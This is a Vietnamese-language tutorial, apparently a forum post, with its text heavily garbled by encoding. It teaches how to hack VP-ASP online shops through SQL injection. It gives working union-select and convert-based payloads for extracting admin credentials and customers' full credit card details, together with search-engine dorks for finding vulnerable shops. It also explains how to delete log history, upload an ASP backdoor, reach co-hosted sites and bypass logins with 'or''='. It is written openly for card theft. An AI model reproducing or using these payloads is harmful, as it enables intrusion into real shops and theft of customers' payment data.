Hôm nay =ẽ là Tut hack shop

Hack cc qua lỗi Jet, chỉ =C3?p dụng đc với shop VP-ASP và những shop bạn biết rõ cấu =rúc của nó, còn lỗi Ole thì xem =hía dưới

Code:

%20union select 1 from =bluser'hxxp://yami.com/shopdisplayproducts.asp?Cat=book&am=;catid=3%20union select 1 from tbluser'

Và các shop thì ko =ao giờ chỉ có 1 column trong db nên chắc chắn nó sẽ =áo:

The number of columns in the two selected tables or queries of a union query do not =atch.

Đa số các cột thường lớn hơn 30, nên =ôt nhất là thử từ số =0:

code:

Code:

%20union select =,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 =21,22,23,24,25,26,27,28,29,30 from tbluser'mục đích đánh số thứ tự, =hẳng qua là chỉ để phân =iệt các column với nhau, nên bạn không cần phải =C4?ể ý rằng: "Liệu mình có =õ theo đúng thứ tự chưa..." Thậm chí bạn có =hể không cần phải gõ theo thứ =ự: %20union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1 =rom tbluser'

Nhưng khi phát sinh lỗi cần =hiết thì lại không phân biệt =C4?ược column nào mà thôi.

Tiếp =ục: =xxp://yami.com/shopdisplayproducts.asp?Cat=book&catid=3%20union = select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30 from tbluser'

Nếu =ại hiện ra lỗi trên thì nghĩa là chưa đúng =ố column cần thiết, bạn phải =hêm vào, bây giờ tăng lên 31, nếu vẫn =hưa đúng lại tăng lên 32 ... cho =C4?ến khi ko còn lỗi, mà thay vào đó..., bạn =ãy chú ý, sẽ có những con =ố rất lạ, xuất hiện bất thường trên trang web =ày. Ví dụ như 4, 22 hay bấy kì =ố nào...(đưong nhiên những số =ày phải là những số mà =ạn đã type trên code)

Ví dụ trên web xuất =iện số 4 và 3. Mình sử dụng =ố 3 cho việc khai thác u va p của admin. Nhìn =ên code, tìm chỗ nào có số 3 =ồi thay bằng: fldusername%2b'/'%2bfldpassword.

code:

Code:

%20union select =,2,fldusername%2b'/'%2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,1 =,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from =bluser'Nhấn enter và chỗ số 3 bất =hường đó sẽ biến thành =sername/password ^ ^

-Tìm link =dmin:

link mặc định là shopadmin.asp, thử thay shopdisplayproducts.asp... =hanh shopadmin.asp. Nếu không được thi... =C4?ành tự kiếm thôi

và nó =ằm ở đâu, như ở trên đã nói nó nằm tại bảng =onfiguration:

vẫn giữ nguyên số =ột mà bạn đã khai thác được, thay column =C4?ầu bằng fieldname='xadminpage', thay column lỗi-muốn hiển thị bằng =ieldvalue (ở đây là số 3)

Code:

%20union select =ieldname='xadminpage',2,fieldvalue,4,5,6,7,8,9,10 =11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 =,28,29,30,31,32,33,34,35,36,37 from configuration'1 là bạn sẽ có link admin, 2 là =ẽ gặp dòng thông báo =ày:

The Microsoft Jet database engine cannot find the input table or query = 'configuration'. Make sure it exists and that its name is spelled correctly.

Nó báo thế nghĩa là =hông có bảng config -> thằng admin đã xóa bảng confing và =ết lấy link admin

Nếu bạn =hông có được link admin, bạn vẫn có =hể get cici như thường, bằng =ách truy vấn table orders.

code (cũng dán tại column =ố 3):

Code:

%20union select =,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 =21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from =rders'Thay số 3 bằng cái này:

Code:

odate%2b'/'%2bofirstname%2b'/'%2bolastname%2b'/'%2boaddress%=b'/'%2bocity%2b'/'%2bostate%2b'/'%2b

opostcode%2b'/'%2bocountry%2b'/'%2bophone%2b'/'%2bocardno%2b'/'%2bocardna=e%2b'/'%2bocardexpires%2b'/'%2boauthorizationNếu không hiện gì ra, nghĩa là shop =C4?ó không có cici ^ ^

- Hack Pass thứ =:

Nếu bạn có link admin, nhưng shop này có tới 2 pass: Kiếm =C4?âu ra pass thứ 2 bây =iờ?

Không có gì khó, nhưng bạn phải xem trang =C4?ó có bị lỗi tại page: =hopexd.asp hay không, nếu không có lỗi tại =C4?ó thì... khỏi kiếm pass 2 lun ^ ^.

Cách hack như trên, giả =ử tại page này column 20 bị lỗi

Dùng code như khi kiếm link =dmin tại chỗ này:

Code:

%20union select =ieldname='xadminpage',2,3,4,5,6,7,8,9,10,11,12,13 =14,15,16,17,18,19,fieldvalue,21,22,23,24,25,26,27 =28,29,30,31,32,33,34,35,36,37 from =onfiguration'Rồi, nếu ok nó sẽ sổ ra mã =guồn asp của trang admin, và bạn =ẽ nhìn thấy pass 2 tại dòng lênh: Const SecondPassword="pass ="

Tiếp, nếu bạn muốn tìm link admin tại page này thì =hải dùng code sau:

Code:

%20union select =ieldname='xadminpage',2,3,4,5,6,7,8,9,10,11,12,13 =14,15,16,17,18,19,left(fieldvalue,9),21,22,23,24, =5,26,27,28,29,30,31,32,33,34,35,36,37 from =onfiguration'nếu nó vẫn ra mã nguồn, thì nghĩa =à số kí tự của link admin nhỏ =ơn 9 hoặc bằng 9, bạn thay 9 bằng số 7. => giả sử nó sẽ hiện ra =hế này: shoa.as Nhìn thể này thì đủ =iết link admin là gì rồi. Còn =ếu dùng code trên mà nó chưa hiện ra dấu . thì =ạn chưa thể khẳng định =C4?ược, thì hãy tăng lên, thay 9 bằng 11 hoặc 12 v..v.... Cứ =hế.

Part II

--------------------------------------------------

<=ONT color=yellow>-Shop VP ASP sử dụng SQL =erver

Không giống như MS Access, SQL Server có một table mặc =C4?ịnh chứa tất cả tên =ủa table và column của cơ sở dữ liệu =C4?ó. Table đó tên là: information_schema

Các trang buôn bán, ng ta =hông phải ai cũng biết lập trình web nên có =hể họ mua bất kì script của =ột cá nhân hoặc một công ty nào đó, giống =hư script của vp asp vậy. Có thể =ạn biết shop đó hiện đang dùng script gì, =ạn có thể mua bản đó về =ài offline và nghiên cứu từ csdl đến =ấu trúc site để tìm ra lỗi =ủa nó. Xong đối với những shop dùng csdl là SQL Server thì =ó thể bạn không cần phải =àm vậy.

Nhờ có hàm convert =ạn có thể cố ý biến =C4?ổi kiểu dữ liệu của nó để gây ra lỗi. Nên =ách khai thác kiểu này nhanh hơn cách =ùng cho access. Và đối với access bạn =hải biết trước tên của =C4?ối tượng cần truy vấn.

~~~~

code khai thác tên =ác table:

Code:

%20and 1=convert(int,(select =op 1 table_name from =nformation_schema.tables))--sp_passwordcode khai thác tên các column:

Code:

%20and 1=convert(int,(select =op 1 column_name from information_schema.columns where =able_name=('[tên của table cần khai thác =olumn]')))--sp_passwordcode khai thác giá trị của các =olumn:

Code:

%20and 1=convert(int,(select =op 1 [tên column 1] %2b '/' %2b [tên column 2] from =bluser))--sp_password~~~~

Xong vì đối với shop vp asp, tên =ủa các table và column đều đã =C4?ược public cả rồi nên code sau dùng để khai =hác một cách nhanh chóng.

Tìm username và pass của admin:

Code:

%20and 1=convert(int,(select =op 1 fldusername %2b '/' %2b fldpassword from =bluser))--sp_passwordhxxp://yami.com/shopdisplayproducts.asp=Cat=book&catid=3%20and 1=convert(int,(select top 1 fldusername %2b '/' %2b fldpassword =rom tbluser))--sp_password

Tim link admin:

Code:

%20and 1=convert(int,(select =op 1 fieldname%2b'/'%2bfieldvalue from configuration where =ieldname='xadminpage'))--sp_passwordNếu không có link admin bạn có thể khai =hác cc bằng cách sau:

Code:

%20and%201=convert(int,(select%20top%201%20convert(char,(o=ate))%2b'/'%2bofirstname%2b'/'%2bolastname%2b'/'%2boaddress%2b'/'%2bocit=%2b'/'%2bostate%2b'/'%2bopostcode%2b'/'%2bocountry%2b'/'%2bophone%2b'/'%=bocardno%2b'/'%2bocardname%2b'/'%2bocardexpires%2b'/'%2boauthorization%2=from%20orders where ocardno%20not%20in('') and right(ocardexpires,2) =ot in('05')))--sp_password(Đoạn code dài quá nên ngắt làm 3 =hần, các bạn copy thì nhớ cẩn =hận nha)

code trên có nghĩa khai thác =oàn bộ thông tin của card mà có ngày hết hạn không phải là =ăm 2005. Mỗi khi nhận được 1 =vv, bạn copy cc number vào phần ocardno not in(''). Ví =ụ bạn nhận được cái =ảd 4111111111111111 thì để lấy cái =iếp theo sao không cho nó trùng lặp thi thêm vào cho ocardno not in('','4111111111111111'). =găn cách bằng dấu ,

Đoạn code trên có chỗ =onvert(char,(odate)) có nghĩa nó sẽ =huyển trước giá trị là day time sang =iểu char trước khi chuyển sang =iểu int. Vì nếu bạn chuyển ngay sang =iểu int thì khoảng giá trị là =goài vùng được chọn và sẽ mang lại kết =uả không mong đợi. Đó là =ý do vì sao nhiều bạn hack shop qua lỗi Sql inject lại không =ấy được trường ngày tháng.

Tiếp theo về pass 2. Làm =ao để tìm? Sử dụng code sau, và bạn lại phải 1 lần nữa =gồi đoán số column:

%20union select =op 1 1,2,3,4,5,6... from configuration

Cũng giống =hư cách hack đối với Access nhưng chỉ khác là có thêm =op 1

Part =II

----------------------------------------------------------<=R>

Khi vào login được vào quyền =dmin, nhiệm vụ đầu tiên của =ạn là phải xóa log history đi, để thằng chủ shop =hông biết được có ng khác =âm nhập vào trái phép. Chọn mục Log History -> chọn =ần login và địa chỉ ip của =áy mình -> Xóa. Nhưng có khi bạn lại =hông thấy mục History đâu, và =hông chỉ riêng gì History mà những mục =hác cũng không có. Vậy là =hằng chủ shop không enable lên hoặc user của =ạn không đủ quyền =ạn.

Vì bạn đang nắm là quyền admin, những mục =ia chẳng qua là nó đã hide đi mà =hôi, nếu bạn muốn chọn một user ở =ức cao hơn bạn có thể thay dòng =hopadmin1.asp trên url bằng page sau: shopa_user_control.asp =ào đây bạn có thể edit và xem pass của các user, nếu muốn =C4?ăng nhập user khác, hãy clear cookie =à đăng nhập lại.

Các page quan =rọng:

-Xem tất cả các Order: shopa_listorders.asp

-Mục Log History: =hopa_loghist.asp

-Xem quyền hạn các User: shopa_user_control.asp

-Truy =ấn csdl: shopa_query.asp

-Config Shop: shopa_configlist.asp và shopa_config.asp

Khi hack được shop, =C3?t ra bạn sẽ có được =ailist, chọn mục Query hoặc xóa page =hopadmin1.asp trên url và thay thế bằng page: shopa_query.asp ->Gõ vào ô query và =un lệnh sau bạn sẽ có mailist: select oemail from orders

Hack lên =erver:

Nghe thì ghê gớm lắm xong lại rất =C4?ơn giản. Bạn vào mục Display =roducts và Edit bất kì một sản phẩm nào. =éo xuống, bạn sẽ thấy dòng =hữ upload images, click vào đó. Hoặc nếu không =hấy, vì thăng chủ shop hơi bị =hôn thì dán page này vào: shopa_upload.asp Sau đó =ấm Browse... và chọn 1 con backdoor từ máy của bạn để =C3?p lên server của nó. Nhớ là =ackdoor ASP nhé .

Dạo này thằng chủ shop =ũng có nhiều đứa khôn lắm, =ên có thể up thành công hoặc không. Upload thành =ông thì nó sẽ báo là Upload has been sucess... và bên dưới là =C4?ường dẫn chứa backdoor của =ạn, copy và dán lên url rồi....

Lên server rồi thì =ự mò nha, cũng dễ thôi ^ ^

Mà mục đích lên server =à gì nhỉ? Là để tìm =iếm nhữ site shop khác cũng thuê chỗ tại server =C4?ó. Bạn sẽ có quyền tải =ile, dựa vào khả năng phán đoán bạn sẽ =iết nó cất csdl ở đâu và =own về. Khi up con này lên server rồi, thì bạn bấm up =C4?ể trở ra thư mục lớn =ơn, rồi nhìn lên url, bạn sẽ thấy nguyên cái =C4?ường dẫn, bạn thay đổi =C4?ường dẫn... cứ tưởng tượng đơn giản, đó =à cái máy tính của bạn =ậy.

Part IV

Sau khi các bạn lên server, và tìm =C4?ược thư mục chứa các =ebsite thì công việc tiếp theo là phải tìm cho được =C4?âu là cái shop để tiếp =ục kiếm cici

Nếu như nó đặt tên thư mục =ho mỗi site là tên gợi nhớ (domain =ủa site) thì chắc hẳn các bạn dễ dàng =õ vào address của trình duyệt cái =omain của site đó và biết nó có =hải là 1 shop hay không! Nhưng nó =ại không thích đặt vậy, mà lại đánh =í tự số cho từng site, hoặc =C4?ặt tên lung tung thì bạn làm thế nào để =iết được domain của nó là =ì? Nếu như phải down 1 vài page về, nhìn vào baner hay hình =E1??nh nào đó hoặc phần copyright =ó thể có tên miền thì quả thật là =ơi mất thời gian và có thể =à không tìm thấy.

Cách hữu hiệu =hất, đơn giản nhất và =ốt nhất là bạn nên sử dụng google. Download 1 page về, copy phần =opyright hoặc phần đặc trưng của site vào ô search của google. =ấm enter, bạn sẽ thấy =C4?ược ... trang bạn cần tìm.

Hoặc vào google =õ cú pháp sau:

"cụm từ =C4?ặc trưng trong page" inurl:[tên của page bạn down =ề]

Okie, thế là đã tìm được tên miền, và hãy =ìm xem có shop nào không? Khi đã tìm =a 1 shop, dù cho shop đó cất kĩ database =C4?ến đâu, hay không có lỗi, =ạn vẫn có thể lấy cc của nó được

Ví =ụ, mình tìm được 1 thư =ục tên A có chứa site shop. Vào trong thư mục đó, 1 là =ạn có thể tìm thấy database và =own về, xong nếu không thể lấy =C4?ược thì hãy tìm page login admin =ủa nó! Bạn đang ở trên server mà, nên việc tìm =age của admin cũng không khó lắm. Khi =C4?ã tìm ra, username và pass ở đâu =C4?ể bạn có thể đăng =hập nhỉ ??? Và shop này không hề có lỗi =ào.

Đầu tiên bạn hãy down =ái page admin về. Bấm vào dòng chữ "MASS TEST IN..." của con =ackdoor, nó sẽ liệt kê cho bạn thấy những thư mục nào =ạn có thể upload file. Nhưng =rước khi upload, bạn hãy sửa lại mã nguồn ở =age admin.

Xác định thư mục =ạn sẽ upload. Tìm trong page admin (đã save về máy =à đã mở mã nguồn lên) xem =ó dòng include ... thì thay đường dẫn cho =hích hợp, để từ thư mục =ạn sẽ up lên, nó có thể tìm thấy file mà =ạn include. Tiếp đến tìm tù =ày: replace

Và bỏ hàm replace đi. =í dụ trong code: user=replace(username,''','"'). Bỏ dòng này =C4?i, tương tự đối với =hững chỗ khác, tuy nhiên bạn cần phải =inh hoạt hơn. Có những shop viet code =ử dụng hảm replace như sau: Select * from tbl =here replace(user,''','"')... Nếu như thế này thì bạn =ỏ cái hàm replace thôi, và sẽ =hành đoạn code như sau: select * from tbl where user...

Xong xuôi =ồi thì save lại và up lên thư mục bạn đã =họn.

Ví dụ domain của shop =C4?ó là: hxxp://yami.com/

link admin chính xác là: hxxp://yami.com/admin.asp

thư mục cho =hép up là images.

Link bạn up trang admin giả =ên sẽ có dạng: hxxp://yami.com/images/admin.asp

Rồi! Bạn =ãy gõ hxxp://yami.com/images/admin.asp vào trình duyệt =à thử login

Username: 'or''='

Password: =or''='

bấm ok và page not found ^ ^... cái này các bạn =C4?ừng lo, vì trong file include nó sẽ =hỉ sang 1 trang mà admin đã đăng =hập không phải nằm trong images nên =age not found cung chẳng có gì là lạ. =uy nhiên, máy của bạn đã lưu =ookie của admin nên bạn chỉ cần gõ =C4?úng link admin: hxxp://yami.com/admin.asp. Thế là nó tự động chuyển sang =rang mà bạn đã login vào admin. ^ ^ Vô =C4?ược rồi thì... get cc thôi

HƯỚNG DẪN HACK SHOP BẰNG SQL INJECTION

Phần =

Tất cả những kiến thức này đều rất =ăn bản , Nhưng lại hết sức =ữu dụng trong việc hack shop.Chỉ cần thành thạo những =iến thức này là bạn hack =C4?ược cả đống shop rồi .

Để tìm site bị =ỗi kiểu này đòi hỏi bạn =hải có nhiều kinh nghiệm tìm lỗi và search shop như thế =ào cho thật hiệu quả. Nên search shop =E1?? xxxx.google.com hoặc xxxx.search.com Từ khoá =ên =ùng:allinurl:"shopdisplayproducts.asp?id="ho� =EF?? ?c search theo domain allinurl:".com/shopdisplayproducts.asp?id= "bạn =ó thể thay .com bằng .net,.biz ,.us.....vv thay id bằng cat

theo tôi =hi search bạn nên thêm giá trị của id= ví dụ như =allinurl:"shopdisplayproducts.asp?id=9"

Mỗi lần thay giá trị như vậy =ẽ cho ra thêm nhiều kết quả =ới .Sau khi search xong bạn chọn lấy một site =ất kỳ ta.thêm dấu nháy đơn = .

xxxxxxvictim.com/shopping/shopdisplay...asp?id=153' =BR>Nếu ko báo lỗi, bạn hãy thử thay id bằng =at xem xxxx.victim.com/shopping/shopdisplay...sp?cat=153' =BR>

Trích: Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''./shopping/shopdisplayproducts.asp, line 93

Oh có =ỗi rồi. Bạn nhìn kỹ nhé -----> Unclosed quotation mark =efore the character string đối với lỗi này ta sẽ =ùng and 1=convert , Còn nếu nó báo =hế này

CODE

Microsoft JET Database Engine error =80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid =nd cc.intcategoryid=c.categoryid and c.catdescription like '5'%' =nd hide=0 order by specialoffer desc,cname'. /shop$db.asp, line =67

Thì đây là lỗi jet Bạn hãy chuyển qua =hần 2

Bây giờ ta tiếp tục =

Trích:

CODE

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''./shopping/shopdisplayproducts.asp, line 93

Bước I:

Lấy table : =C4?ây là câu lệnh cơ bản =C4?ể lấy table:

Code:

and 1=convert(int,(select top = table_name from =nformation_schema.tables))--sp_passwordbạn xoá dấu ' rồi thêm dòng query =ày vào phía sau

ta được như =hế =ày

xxxxxx.victim.com/shopping/shopd...from%20information_schema.=ables))--sp_password

Chú ý : %20 là mã ascii của dấu =ách (space) , do IE ko chấp nhận dấu =ách nên nó phải chuyển sang ascii

Trích: =BR>CODE

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL =erver Driver][SQL Server]Syntax error converting the nvarchar value =ver_Faq' to a column of data type int./shopping/shopdisplayproducts.asp, line =3

kết quả 'ver_Faq' là tên =ủa table đầu tiên trong cơ sở =ữ liệu :câu lệnh lấy table tiếp theo :

Code:

and 1=convert(int,(select top = table_name from information_schema.tables where table_name not in ='ver_Faq')))--sp_passwordta được thế =ayxxxxxhttp://www.victim.com/shopping/shopd...from%20informa tion_schema.tables%20where%20table_name%20not%20in %20('ver_Faq')))--sp_password

Trích: =BR>CODE

ProductsMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC =QL Server Driver][SQL Server]Syntax error converting the nvarchar =alue 'coupons' to a column of data type =nt./shopping/shopdisplayproducts.asp, line 93

Ta cứ lấy tiếp như =ậy :

xxxxxx.victim.com/shopping/shopd...%201=convert(i[/url] nt,(select%20top%201%20table_name%20from%20informa tion_schema.tables%20where%20table_name%20not%20in %20('ver_Faq','coupons')))--sp_password

Bước =I : lấy column mục đích của chúng ta là tìm =hông tin liên quan đến admin , thông =hường nó nằm trong các table : users, =bluser,AdminUsers..........Giả sử ở =C4?ây là tbluser

Câu truy vấn dùng để =ấy column:

Code:

and 1=convert(int,(select top = column_ name from information_schema.columns where =able_name=('tbluser')))--sp_passwordta được thế =ayxxx.victim.com/shopping/shopd...cts.asp?id=153 and 1=convert(int,(select top 1 column_ name from =nformation_schema.columns where =able_name=('tbluser')))--sp_password

Trích:

CODE

Pro=uctsMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC =QL Server Driver][SQL Server]Syntax error converting the nvarchar =alue 'fldauto' to a column of data type =nt./shopping/shopdisplayproducts.asp, line 93

Lấy column tiếp theo:

Code:

and 1=convert(int,(select top = column_ name from information_schema.columns where =able_name=('tbluser') and column_name not in ='fldauto')))--sp_passwordKhi thêm code xong sẽ như thế =ày:

xxx.victim.com/shopping/shopd...%201=convert(int,(select%2=top%201%20colum n_name%20from%20inform =tion_schema.columns%20where%20table_name=('tbluse r')%20and%20column_name%20not%20in%20('fldauto'))) =-sp_password

Trích: Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax =rror converting the nvarchar value 'fldusername' to a column of data =ype int./shopping/shopdisplayproducts.asp, line 93 =BR>

Lấy column tiếp theo :

Code:

and 1=convert(int,(select top = column_name from information_schema.columns where =able_name=('tbluser') and column_name not in ='fldauto','fldusername')))--sp_passwordxxx.victim.com/shoppi=g/shopd...%201=convert(int,(select%20top%201%20colum n_name%20from%20inform =tion_schema.columns%20where%20table_name=('tbluse r')%20and%20column_name%20not%20in%20('fldauto','f =dusername')))--sp_password

Trích

CODE

Microsoft =LE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC =QL Server Driver][SQL Server]Syntax error converting the nvarchar value 'fldpassword' to a column of data type int.

/shopping/shopdisplayproducts.asp, line 93

Ok =C4?ược rồi, giờ ta lấy username và password =

++++Câu truy vấn :

_Lấy username

and 1=convert(int,(select top 1 fldusername from tbluser))--sp_password

Microsoft OLE DB Provider for ODBC =rivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax =rror converting the nvarchar value 'admin' to a column of data type =nt. /shopping/shopdisplayproducts.asp, line 93----------> username =à admin

_Lấy password :

and ==convert(int,(select top 1 fldpassword from tbluser))--sp_password

Microsoft OLE DB =rovider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server =river][SQL Server]Syntax error converting the nvarchar value '1234' to a =olumn of data type int. /shopping/shopdisplayproducts.asp, line =3----------> pass là 1234

Hoặc có thể =ấy cả 2 cùng 1 lúc

Code:

and 1=convert(int,(select top = fldusername%2b'/'%2bfldpassword from =bluser))--sp_password%2b là mã ascii của dấu +

Microsoft OLE =B Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax =rror converting the nvarchar value 'admin/1234' to a column of data =ype int. /shopping/shopdisplayproducts.asp, line 93

Chú ý =Nhiều khi bạn không thể tìm thấy table tbluser =oặc users hay các table (có vẻ) liên quan đến thông tin admin .Lúc này =hẳng nhẽ bạn đành lấy =ần lượt các column trong từng table sao ? Chúng ta có 1 =ách khác nhanh hơn đó là dùng từ khoá like

Giả sử ta cần =ìm column 'fldpassword' mà không biết nó =E1?? đâu .Ta thử search tại Table =C4?ầu tiên 'ver_Faq'

Câu truy vấn =hư sau:

Code:

and 1=convert(int,(select top = column_name from information_schema.columns where =able_name=('ver_Faq') and column_name like ='%25pass%25')))--sp_passwordBạn chú ý : câu truy vấn này sẽ =rả về tên của column đầu =iên mà tên của nó có chứa chữ "pass"

Trích :

No =roducts match your search

Oh vậy là table 'ver_Faq' ko có column nào mà =ên của nó có chứa chữ "pass" =Đến đây chắc bạn biết làm =ì tiếp, ta cứ search các table khác, =able nào có nó sẽ cho ra kết quả như sau =

TríchMicrosoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server =river][SQL Server]Syntax error converting the nvarchar value 'fldpassword' to = column of data type int.

/shopping/shopdisplayproducts.asp, =ine 93

Bước III:

Sau =hi đã có username và password việc còn lại là tìm link =dmin .Ví dụ link của shop là thế =ày

xxxxvictim.com/shopping/shopd...cts.asp?id=153

Thì =ink admin có thể nằm =E1??

xxxx.victim.com/shopping/shopadmin.asp Hoặc xxxx.victim.com/shopping/shopadmin1.asp

Nếu không =C4?ược bạn hãy làm theo cách của tôi :

Ta biết column =ieldvalue và fieldname chứa link admin

Column fieldvalue và fieldname thường =ằm trong table configuration

Nhưng nhiều khi bạn =C4?ã lấy được tất cả =able của shop nhưng vẫn không thấy table configuration = đó là vì table này đã bị =ename , lúc này buộc bạn phải =ử dụng tiếp từ khoá like =C4?ể search column filedvalue . Cái này tôi không nói =hêm nữa bạn. cứ áp dụng theo =ướng dẫn ở trên.

Để lấy link admin =ạn dùng câu truy vấn như sau :

Code:

and 1=convert(int,(select top = fieldname%2b'/'%2bfieldvalue from configuration where =ieldname='xadminpage'))--sp_passwordTrích:Microsoft OLE DB Provider for ODBC Drivers error '80040e07' =BR>[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar =alue 'xadminpage/5h0padm1n.asp' to a column of data type int.

/shopping/shopdisplayproducts.asp, line 93

ok link admin =à 5h0padm1n.asp

Giờ thì bạn đã =ó shop rồi, giờ chỉ cần vào =iew cc nữa thôi ()

Phần =I:

hack các shop jetdatabase

Đây là một ví dụ , =ạn có thể thực hành ngay tại =hop =ày

xxx.treasureshidden.com/shopp...ucts.asp?cat=9

bạ= thêm vào sau 1 dấu nháy đơn =

xxxx.treasureshidden.com/shopping/sh....asp?cat=9'

ok báo lỗi rồi

9' Microsoft JET =atabase Engine error '80040e14' Syntax error in query expression 'cc.intcatalogid=p.catalogid =nd cc.intcategoryid=c.categoryid and c.catdescription like '9%' and =ide=0 order by specialoffer desc,cname'. /shop$db.asp, line =12

Bạn chú ý chỗ này nhé -----------> Syntax error in query expression = 'cc.intcatalogid=p.catalogid and cc.intcategoryid=c.categoryid =nd c.catdescription like '9%' and hide=0 order by specialoffer desc,cname'

Khi nó báo như vậy thì =a sẽ dùng union ( bạn giữ nguyên dấu ' nhé )

Câu lệnh như sau =

union select 1 from tbluser"having 1=1--sp_password

---->xxxx.treasureshidden.com/shopping/sh....asp?cat=9' =nion select 1 from tbluser"having 1=1--sp_password

-------------%--------------chú thích-------------%----------------

Nếu nó =áo thế này hoặc tương tự )

Microsoft JET Database Engine error '80040e14' Syntax error =n query expression 'cc.intcatalogid=p.catalogid and =c.intcategoryid=c.categoryid and c.catdescription like '9'%'union select 1 from tbluser"having 1=1--sp_password and hide=0 order by specialoffer desc,cname'. = /shop$db.asp, line 912

Bạn thử thay id =ằng cat , thay cat bằng id hoặc xoá dấu ' xem sao =BR>---------------------------------------------------------------------=---------------

Tiếp tục =hé

xxxx.treasureshidden.com/shopping/sh....asp?cat=9' union =elect 1 from tbluser"having 1=1--sp_password

Khi nó báo =hế này là được rồi

Microsoft JET Database Engine error '80040e14' The =umber of columns in the two selected tables or queries of a union query do =ot match. /shop$db.asp, line 912

Lỗi vừa =ồi nói rằng : có tồn tại =iá trị column chứa thông tin admin

bạn =ứ tiếp tục thêm số vào nhé

xxxx.treasureshidden.com/shopping/sh....asp?cat=9' =nion select 1,2 from tbluser"having 1=1--sp_password

nó vẫn =áo như vậy

Microsoft JET Database Engine error '80040e14' The number of columns in the =wo selected tables or queries of a union query do not match. =shop$db.asp, line 912

ta cứ tiếp tục như vậy

xxx.treasureshidden.com/shopping/sh....asp?cat=9' =nion select 1,2,3 from tbluser"having 1=1--sp_password

xxxx.treasureshidden.com/shopping/sh....asp?cat=9' union =elect 1,2,3,4 from tbluser"having 1=1--sp_password

xxxx.treasureshidden.com/shopping/sh....asp?cat=9' union =elect 1,2,3,4,5 from tbluser"having 1=1--sp_password =BR>.......................

xxxx.treasureshidden.com/shopping/sh....as=?cat=9' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from =bluser"having 1=1--sp_password

Cho đến khi có 1 cái =ảng đẹp đẹp như sau ( ở =C4?ây là số 37 )

3

click to see more422

18Please =eview these other products:

----------------------------Chú thích-----------------------------

Kinh nghiệm qua =hiều lần hack của tôi là bạn nên xem line để =hêm số cho nhanh . Ví dụ như ở =hop này line là 912 -------> /shop$db.asp, line 912 , với line =à 912 thường thì bạn phải thêm đến 37 . Còn một =ố nữa :

line 467 -----> thêm =C4?ến47

line 468 ------> thêm 47

line 469 -------> =hêm 48

còn lại bạn tự tìm hiểu =ha.Nếu không nhớ line thì bạn =ứ thử 1 trong các số thường gặp sau : 34 , 37 , 47 , 48 ,54 , 83 , =4 ,92 ......( Thông thường tôi chỉ thêm đến 84 là =ết kiên nhẫn nổi ) nếu bạn =iên trì thì nên thêm từng số cho chắc ăn () . Tiếp =hé =BR>---------------------------------------------------------------------=---

Bây giờ chúng ta bắt đầu lấy =ser and pass:• fldusername : thay cho số 3 , hay 4, hay 22 tuỳ bạn• fldpassword : thay cho =ố 3 , hay 4, hay 22 tuỳ bạn ( fldusername và fldpassword là tên của 2 =olumn trong tbluser ) ,Ở đây tôi lần lượt thay vào số 3 và =ố 4

Code

http://www.vietexpert.name/forum/redirector.ve?url=%68%=4%74%70%3a%2f%2f%77%77%77%2e%74%72%65%61%73%75%72%65%73%68%69%64%64%65%6=%2e%63%6f%6d%2f%73%68%6f%70%70%69%6e%67%2f%73%68%2e%2e%2e%2e%61%73%70%3f=63%61%74%3d%39' union select 1,2,fldusername,fldpassword,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 =31,32,33,34,35,36,37 from tbluser"having 1=1--sp_password

ok nó sẽ =áo như vầy :

admin

click to see moreadmin32612 22

18Please =eview these other products: =BR>-------------------------------

harvey

click to see moreboha216322

18Please review these other =roducts:

ok shop này có 2 admin + admin pass : admin32612

+ harvey =ass: boha2163

Trong trường hợp nó =hỉ có thế này

3

click to see more

Please review these other products:

bạn =hỉ có thể thay vào số 3 mà thôi vậy ta sẽ =ùng câu lệnh như sau

Code:

union select =,2,fldusername%2b'/'%2bfldpassword,5,6,7,8,9,10,11,12,13,14,15,16,17, =8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37 from =bluser"having 1=1--sp_passwordcái này tôi không giải thích thêm , =hắc bạn hiểu rồi > OK

http://www.vietexpert.name/forum/redirector.ve?url=%68%=4%74%70%3a%2f%2f%77%77%77%2e%74%72%65%61%73%75%72%65%73%68%69%64%64%65%6=%2e%63%6f%6d%2f%73%68%6f%70%70%69%6e%67%2f%73%68%2e%2e%2e%2e%61%73%70%3f=63%61%74%3d%39'

Việc còn lại là tìm link admin

ta cứ =hử 2 link này xem

